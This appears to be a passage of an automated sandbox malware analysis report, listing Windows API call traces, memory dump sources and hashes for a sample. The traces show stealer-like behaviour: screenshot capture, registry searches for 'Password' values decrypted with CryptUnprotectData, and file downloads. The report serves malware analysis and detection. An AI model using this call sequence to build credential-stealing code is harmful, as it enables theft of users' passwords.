                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 0c5ae843efac5c5f6f25d7350551dda9f5d1f3ea7609f87bac523c4d061acbaf
                            • Instruction ID: 741997d0187eb4e15ced63ac7775d93047ca92641fa74acdad10c9cb9576fc85
                            • Opcode Fuzzy Hash: 0c5ae843efac5c5f6f25d7350551dda9f5d1f3ea7609f87bac523c4d061acbaf
                            • Instruction Fuzzy Hash: 7661B271E513199BDB12EFB4C889AEEBFF8EF09740F5400A5E841E7241DB749D498BA0
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00B20CF0), ref: 00B24276
                            • GetDesktopWindow.USER32 ref: 00B24280
                            • GetWindowRect.USER32(00000000,?), ref: 00B2428D
                            • SelectObject.GDI32(00000000,00000000), ref: 00B242BF
                            • GetHGlobalFromStream.COMBASE(00B20CF0,?), ref: 00B24336
                            • GlobalLock.KERNEL32(?), ref: 00B24340
                            • GlobalSize.KERNEL32(?), ref: 00B2434D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 86d586084898d8f0026535af74616162fbebe670a8291117652516d68c6a9817
                            • Instruction ID: 1d471afee582bbb786e5e0dfd60b8e2d705055c182a579d2a599489ee92c09a6
                            • Opcode Fuzzy Hash: 86d586084898d8f0026535af74616162fbebe670a8291117652516d68c6a9817
                            • Instruction Fuzzy Hash: FF510C75A10309AFDB10DFA4ED89AAEBBB9EF48301F104569F905E3250DB74AD05CBA0
                            APIs
                            • lstrcat.KERNEL32(?,0187EE88), ref: 00B1E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E07D
                            • lstrcat.KERNEL32(?,?), ref: 00B1E098
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0AC
                            • lstrcat.KERNEL32(?,0186A938), ref: 00B1E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0D4
                            • lstrcat.KERNEL32(?,0187DB10), ref: 00B1E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: 22e246756b6d0df3d750596389f8987a75c3f1bac8bde10bec2eb33343e00109
                            • Instruction ID: c572de3daca8cd3800db6b7179892f8a4f22976f38c863390634b73279820ae8
                            • Opcode Fuzzy Hash: 22e246756b6d0df3d750596389f8987a75c3f1bac8bde10bec2eb33343e00109
                            • Instruction Fuzzy Hash: 27615C7191021CABCB55DB64CC59ADDB7F4BF48300F5049E5AA1AE3290DF70AF898F90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B06AFF
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B06B2C
                            • StrCmpCA.SHLWAPI(?,0187F178), ref: 00B06B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00B06B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B06B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00B06BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00B06BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00B06BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00B06C10
                            • InternetCloseHandle.WININET(00000000), ref: 00B06C17
                            • InternetCloseHandle.WININET(?), ref: 00B06C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: 5cc706e56f606cb99b2362af291456188d927142239458702868a3a67ba7eb41
                            • Instruction ID: 9d7a30ceb7c22bcc1191438d0112a73d5e816655658ba3aa2747357be74c9c4c
                            • Opcode Fuzzy Hash: 5cc706e56f606cb99b2362af291456188d927142239458702868a3a67ba7eb41
                            • Instruction Fuzzy Hash: B14131B1600315ABDB24DB64DC86FAE7BA8EF44701F1045A4FA05E72D0DF70AD459BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0BC1F
                            • lstrlen.KERNEL32(00000000), ref: 00B0BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0BCAC
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B0BD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 950a0ca569d4e87036510bdb75d0a1ddaf6b11c9208d640c44d4ef4223e14d36
                            • Instruction ID: 5336df590c2b964037683da6dba63dd7dfc89d40dd918b0b6adecac52ca29eb7
                            • Opcode Fuzzy Hash: 950a0ca569d4e87036510bdb75d0a1ddaf6b11c9208d640c44d4ef4223e14d36
                            • Instruction Fuzzy Hash: 89A11B306113058FDB25DF68D949AAABBF4EF44305F1885B9E806EB3A1DB35DC46CB50
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B25F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00B26014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 00B2609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 00B260D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: b3b16f256049e09261d1f05fb710fedf8e15266d4a2a61efa3847cc17e3545c5
                            • Instruction ID: 36b4d0aca88df8709e14492e0b442486f6971ac7cfc17b467a26605c686cff03
                            • Opcode Fuzzy Hash: b3b16f256049e09261d1f05fb710fedf8e15266d4a2a61efa3847cc17e3545c5
                            • Instruction Fuzzy Hash: FE619E70B00524DBDB28CF5CEDD496EB3F6EF84704B244A99E59A87381D731ED809B94
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1E07D
                            • lstrcat.KERNEL32(?,?), ref: 00B1E098
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0AC
                            • lstrcat.KERNEL32(?,0186A938), ref: 00B1E0C0
                            • lstrcat.KERNEL32(?,?), ref: 00B1E0D4
                            • lstrcat.KERNEL32(?,0187DB10), ref: 00B1E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 9ddb1d24382ad66cdd540ab578506ec64fb98bce84172893cbf7cf31c0ddce6d
                            • Instruction ID: 0b71b1ba44a09d808aa3cd2c42383357df925d013ee1e0a0ec500e6f5d11c37d
                            • Opcode Fuzzy Hash: 9ddb1d24382ad66cdd540ab578506ec64fb98bce84172893cbf7cf31c0ddce6d
                            • Instruction Fuzzy Hash: 66411C71910218ABCB25EB68DC49ADDB7B4BF48310F5049E5B91AA3251DB709F898BA0
                            APIs
                              • Part of subcall function 00B077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B07805
                              • Part of subcall function 00B077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00B0784A
                              • Part of subcall function 00B077D0: StrStrA.SHLWAPI(?,Password), ref: 00B078B8
                              • Part of subcall function 00B077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B078EC
                              • Part of subcall function 00B077D0: HeapFree.KERNEL32(00000000), ref: 00B078F3
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B07A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00B07ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00B07ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B07AF0
                            • wsprintfA.USER32 ref: 00B07B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B07B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B07B47
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B07B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 612a0939652ad2fcee9e3729c7e2884e3bec69ba8bfa05803c866e0fda88fb02
                            • Instruction ID: 5e2ed06dad3ca05e41bac2179924bf81a2d1d7ff88e2cc663719f6dcc88a3d80
                            • Opcode Fuzzy Hash: 612a0939652ad2fcee9e3729c7e2884e3bec69ba8bfa05803c866e0fda88fb02
                            • Instruction Fuzzy Hash: A7319E72A40314AFCB14DBA8DC949AAFBF9EB84300B244599F506E3390DF71B905DBA0
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B1820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18243
                            • lstrlen.KERNEL32(00000000), ref: 00B18260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18297
                            • lstrlen.KERNEL32(00000000), ref: 00B182B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B182EB
                            • lstrlen.KERNEL32(00000000), ref: 00B18308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18337
                            • lstrlen.KERNEL32(00000000), ref: 00B18351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B18380
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: a238d8ba7450ef124eca4f37195c86ad429497f9bdec046e40ec3b290ef711f3
                            • Instruction ID: 253445dae3d563b1c5a074047a1a1410d5ef39398019d5166f83f86d48473dd2
                            • Opcode Fuzzy Hash: a238d8ba7450ef124eca4f37195c86ad429497f9bdec046e40ec3b290ef711f3
                            • Instruction Fuzzy Hash: 2C515D71A006029BDB14DF28E898AAAFBE4FF44740F5545A4BD16EB244DF30ED94CBE0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B07805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 00B0784A
                            • StrStrA.SHLWAPI(?,Password), ref: 00B078B8
                              • Part of subcall function 00B07750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0775E
                              • Part of subcall function 00B07750: RtlAllocateHeap.NTDLL(00000000), ref: 00B07765
                              • Part of subcall function 00B07750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B0778D
                              • Part of subcall function 00B07750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00B077AD
                              • Part of subcall function 00B07750: LocalFree.KERNEL32(?), ref: 00B077B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B078EC
                            • HeapFree.KERNEL32(00000000), ref: 00B078F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00B07A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
